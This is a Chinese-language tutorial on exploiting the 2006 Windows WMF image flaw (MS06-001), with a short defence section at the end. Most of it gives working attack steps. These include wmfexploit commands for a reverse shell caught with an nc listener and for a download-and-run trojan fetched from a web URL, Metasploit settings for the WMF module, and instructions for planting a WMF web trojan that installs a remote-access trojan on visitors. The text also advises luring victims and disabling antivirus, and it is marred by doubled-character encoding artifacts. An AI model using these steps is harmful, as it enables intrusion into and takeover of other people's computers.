就在剛邁入2006年之際，Windows系統(tǒng)出現(xiàn)了一個(gè)嚴(yán)重的漏洞，這就是Microsoft Windows圖形渲染引擎wmf格式代碼漏洞（ms0601）。這個(gè)漏洞出現(xiàn)在Windows的圖形渲染引擎中，黑客可以構(gòu)造惡意的wmf文件，引誘其他用戶(hù)打開(kāi)，當(dāng)系統(tǒng)沒(méi)有更新過(guò)wmf補(bǔ)丁時(shí)，將會(huì)執(zhí)行黑客事先設(shè)置好的惡意代碼，獲取系統(tǒng)的最高權(quán)限，從而完全聽(tīng)命于黑客。就在漏洞公布幾天后，網(wǎng)絡(luò)上使用wmf漏洞進(jìn)行傳播的病毒、攻擊事件不斷，直至今日，網(wǎng)上仍然充斥著無(wú)數(shù)利用wmf漏洞的攻擊。本文將向大家介紹有關(guān)wmf漏洞的知識(shí)及防范方法。

　　由于wmf漏洞涉及的Windows系統(tǒng)版本很多，包括從Windows 98到Windows 2003之間的所有系統(tǒng)版本，因此危害十分巨大。目前利用wmf漏洞的攻擊主要包括兩類(lèi)：1.溢出攻擊 2.利用漏洞制作的網(wǎng)頁(yè)木馬。前者可以讓黑客得到系統(tǒng)的最高權(quán)限，后者則可以將受害者的電腦成為黑客的肉雞。下面我們先來(lái)看看黑客是如何利用wmf漏洞的。

　　一.使用專(zhuān)用溢出工具

　　wmf漏洞的溢出工具在漏洞公布的幾天后就出現(xiàn)在網(wǎng)上，雖然公布時(shí)間較早，存在一些缺陷，但是仍然能輕松得將存在漏洞的主機(jī)溢出。這款溢出工具名叫wmfexploit。下載后將其解壓到c盤(pán)（由于溢出程序會(huì)被殺毒軟件認(rèn)為是病毒，因此測(cè)試時(shí)需要將殺毒軟件關(guān)閉），點(diǎn)“開(kāi)始”→“運(yùn)行”，輸入“CMD”運(yùn)行“命令提示符”。在“命令提示符”中進(jìn)入c盤(pán)，輸入wmfexploit后就可以查看其使用說(shuō)明了。其溢出方式有兩種：1.反向溢出式 2.主動(dòng)下載執(zhí)行式。

　　1.反向溢出，穿透防火墻

　　反向溢出的最大好處就是可以穿透防火墻。同時(shí)由于wmf漏洞的特殊性，我們無(wú)法通過(guò)漏洞掃描器來(lái)確定哪臺(tái)主機(jī)存在漏洞，因此可以使用反向連接，讓有漏洞的主機(jī)主動(dòng)連接本機(jī)。

　　在“命令提示符”中運(yùn)行wmfexploit后，可以查看其反向溢出的使用說(shuō)明。其使用方法如下：wmfexploit 1 。其中數(shù)字1代表的是溢出方式為反向連接，“ ”表示本機(jī)的IP地址和端口，這項(xiàng)的作用是在本機(jī)開(kāi)啟一個(gè)web服務(wù)，使目標(biāo)可以訪問(wèn)本機(jī)的惡意wmf文件，從而造成溢出。最后的“ ”則是反向溢出返回shell時(shí)監(jiān)聽(tīng)的IP地址和端口。這里舉例為“wmfexploit 1 192.168.0.1 777 192.168.0.1 888”。設(shè)置好后回車(chē)，溢出程序會(huì)顯示綁定成功!

圖1.成功設(shè)置反向連接

　　設(shè)置完成后，我們進(jìn)入“命令提示符”，然后運(yùn)行著名的網(wǎng)絡(luò)工具nc，輸入如下命令“nc －vv －l －p 888”，這樣nc就開(kāi)始監(jiān)聽(tīng)本機(jī)的888端口。接著我們就可以引誘目標(biāo)訪問(wèn)我們的惡意wmf文件了。將網(wǎng)址“http：//192.168.0.1:777/any.wmf”發(fā)給對(duì)方即可。當(dāng)目標(biāo)打開(kāi)這個(gè)地址時(shí)，就會(huì)運(yùn)行我們捆綁有溢出信息的wmf文件。我們回到用nc監(jiān)聽(tīng)的窗口，可以看到，目標(biāo)主機(jī)已經(jīng)成功溢出了。

圖2.溢出后得到一個(gè)shell 

　　提示：上文中提到的IP地址192.168.0.1，屬于內(nèi)網(wǎng)IP，只是方便進(jìn)行本機(jī)測(cè)試，如果想對(duì)外網(wǎng)的主機(jī)進(jìn)行測(cè)試，則需要將本機(jī)的內(nèi)網(wǎng)IP改為外網(wǎng)IP。

　　2.下載執(zhí)行，直接運(yùn)行木馬

　　除反向溢出外，wmfexploit還有一種溢出方式就是下載執(zhí)行式。當(dāng)目標(biāo)主機(jī)運(yùn)行惡意wmf文件發(fā)生溢出后，不會(huì)將shell發(fā)送到本機(jī)監(jiān)聽(tīng)的端口上，而是直接從指定的網(wǎng)址上下載一個(gè)exe文件運(yùn)行，這個(gè)文件可以是木馬，也可以是其他程序。當(dāng)然我們還需要有一個(gè)網(wǎng)頁(yè)空間，用來(lái)放置需要執(zhí)行的exe文件。

　　查看下載執(zhí)行式溢出的使用方法：wmfexploit 2 。數(shù)字2表示將溢出方式改為下載執(zhí)行式，最后的表示exe文件所在的網(wǎng)址。舉例為“wmfexploit 2 192.168.0.1 777 http://www.***.com/123.exe”。設(shè)置完成后我們不需要用nc進(jìn)行監(jiān)聽(tīng)，只需發(fā)送網(wǎng)址“http：//192.168.0.1:777/any.wmf”即可。

二.使用圖形化的溢出測(cè)試系統(tǒng)

　　metasploit是一款著名的溢出測(cè)試系統(tǒng)，幾乎可以對(duì)目前所有的溢出漏洞進(jìn)行測(cè)試，可以說(shuō)是所有溢出程序的整合。當(dāng)然其不是簡(jiǎn)單得將溢出程序堆放在一起，而是提供了一個(gè)方便操作，針對(duì)性強(qiáng)的溢出測(cè)試平臺(tái)。這個(gè)測(cè)試系統(tǒng)的最大優(yōu)點(diǎn)是使用了一個(gè)完全圖形化的操作界面，這對(duì)于菜鳥(niǎo)進(jìn)行溢出測(cè)試是很方便的。

　　下載安裝metasploit。完成后點(diǎn)擊“開(kāi)始”，運(yùn)行程序組中的“MSFUpdate”，程序會(huì)彈出一個(gè)“命令提示符”窗口，顯示需要更新的文件列表，輸入“yes”回車(chē)后就可以開(kāi)始進(jìn)行溢出程序更新。更新完畢后運(yùn)行“MSFweb”，用于開(kāi)啟本機(jī)的metasploi瀏覽服務(wù)。然后打開(kāi)瀏覽器，在地址欄中輸入“http://127.0.0.1:55555”，就可以打開(kāi)metasploi的操作界面。選擇溢出列表中的“Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution”進(jìn)入漏洞信息界面，然后點(diǎn)擊最下方的“0 - Automatic - Windows XP / Windows 2003 / Windows Vista (default)”進(jìn)行測(cè)試，在接著出現(xiàn)的“Select Payload:”選項(xiàng)中選擇“win32_reverse”。最后來(lái)到溢出相關(guān)信息的填寫(xiě)處，在選項(xiàng)中只需設(shè)置“HTTPHOST”、“HTTPPORT”、“LHOST”、“LPORT”四項(xiàng)即可，其他保持默認(rèn)。設(shè)置方法和原理與wmfexploit相似，在此不再闡述。

圖3.在metasploit中填寫(xiě)溢出信息 

　　同樣將惡意wmf文件的地址發(fā)給目標(biāo)，當(dāng)對(duì)方發(fā)生溢出后，我們點(diǎn)擊進(jìn)入metasploit界面上的“SESSIONS”就可以得到一個(gè)管理員權(quán)限的shell了。

　　提示：在使用metasploi之前務(wù)必進(jìn)行更新，否則很可能沒(méi)有wmf漏洞相關(guān)的測(cè)試選項(xiàng)。

　　三.利用漏洞制作網(wǎng)頁(yè)木馬

　　wmf漏洞造成的最大影響就是網(wǎng)絡(luò)上網(wǎng)頁(yè)木馬滿天飛，由于殺毒軟件對(duì)圖片文件的檢測(cè)功能不夠強(qiáng)大，因此利用wmf漏洞制作的網(wǎng)頁(yè)木馬很容易成功，也成了最近網(wǎng)頁(yè)木馬中的主角。下面我們來(lái)了解一下wmf網(wǎng)頁(yè)木馬的制作。

　　首先我們需要準(zhǔn)備一款木馬程序，這里推薦類(lèi)似灰鴿子的反彈連接型木馬，這樣當(dāng)有目標(biāo)發(fā)生溢出時(shí)會(huì)通過(guò)木馬主動(dòng)連接我們的主機(jī)，而無(wú)需我們主動(dòng)連接，方便了對(duì)肉雞的管理。然后將配置好的木馬程序服務(wù)端放置到網(wǎng)頁(yè)空間上（可申請(qǐng)免費(fèi)空間進(jìn)行存放）。

　　下載wmf木馬的制作程序ms0601。下載完成后在“命令提示符”中運(yùn)行，可以看到使用方法很簡(jiǎn)單：ms0601 [THE URL OF EXEFILE]，直接輸入木馬文件所在的網(wǎng)址即可。回車(chē)后就可以在同目錄下生成一個(gè)exploit.wmf文件，運(yùn)行這個(gè)wmf文件將會(huì)觸發(fā)溢出并自動(dòng)從網(wǎng)頁(yè)上下載木馬文件執(zhí)行。

　　將exploit.wmf文件上傳到網(wǎng)頁(yè)空間中。最后我們需要在網(wǎng)站主頁(yè)的源代碼中插入如下一句代碼：。這樣當(dāng)別人訪問(wèn)主頁(yè)時(shí)，將不會(huì)彈出新的瀏覽器窗口，而是直接運(yùn)行exploit.wmf進(jìn)行溢出。

四.填漏洞，防木馬

　　由于wmf漏洞的公布時(shí)間較晚，因此網(wǎng)絡(luò)上還有很多沒(méi)有打好補(bǔ)丁的系統(tǒng)。無(wú)論是溢出還是網(wǎng)頁(yè)木馬，成功率都很高，這也給病毒和木馬的傳播提供了途徑。在了解了黑客如何利用wmf漏洞后，我們?cè)賮?lái)看看如何才能填補(bǔ)漏洞，防范利用wmf漏洞的網(wǎng)頁(yè)木馬。

　　1.反注冊(cè)dll文件

　　由于需要使用Windows Picture查看惡意wmf文件時(shí)才會(huì)觸發(fā)溢出，因此如果不方便打系統(tǒng)補(bǔ)丁，可以先嘗試反注冊(cè)Windows Picture的dll文件Shimgvw.dll，反注冊(cè)后Windows Picture將不能再運(yùn)行，溢出也就不存在了。

　　反注冊(cè)方法為：點(diǎn)“開(kāi)始”→“運(yùn)行”，輸入“regsvr32 -u %windir%/system32/shimgvw.dll”即可。如果想恢復(fù)使用Windows Picture，可以輸入“regsvr32 %windir%/system32/shimgvw.dll”重新注冊(cè)。

圖4.反注冊(cè)Shimgvw.dll 

　　2.使用漏洞補(bǔ)丁

　　目前微軟已經(jīng)發(fā)布了該漏洞的補(bǔ)丁程序，下載地址：http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx，這是最徹底也是最安全的修補(bǔ)方式。

　　如果不方便打微軟提供的系統(tǒng)補(bǔ)丁，可以推薦使用第三方制作的補(bǔ)丁程序：

　　3.警惕未知圖片文件

　　如果惡意的wmf文件放在網(wǎng)頁(yè)空間中，我們?cè)谠L問(wèn)這個(gè)惡意wmf文件時(shí)會(huì)產(chǎn)生不同的情況，Win2000主要表現(xiàn)為出現(xiàn)下載提示框，要求下載wmf文件。而WinXP和Win2003則會(huì)彈出Windows圖片查看器，圖片的內(nèi)容則無(wú)法顯示。碰到這種情況時(shí)，我們就應(yīng)該小心了，很有可能這個(gè)wmf文件就帶有溢出信息。當(dāng)然不一定只有wmf為后綴的圖片文件才可能觸發(fā)溢出，其他諸如jpg、bmp等圖片格式只要經(jīng)過(guò)構(gòu)造，同樣可以進(jìn)行溢出。因此我們要對(duì)不明圖片多加小心，黑客往往會(huì)為惡意圖片文件取一個(gè)誘人的名字，引誘別人打開(kāi)。

圖5.打開(kāi)惡意wmf文件時(shí)的表現(xiàn) 

　　此外，升級(jí)殺毒軟件是必須的，最新的殺毒軟件病毒庫(kù)都已將惡意wmf文件列為病毒。

最新評(píng)論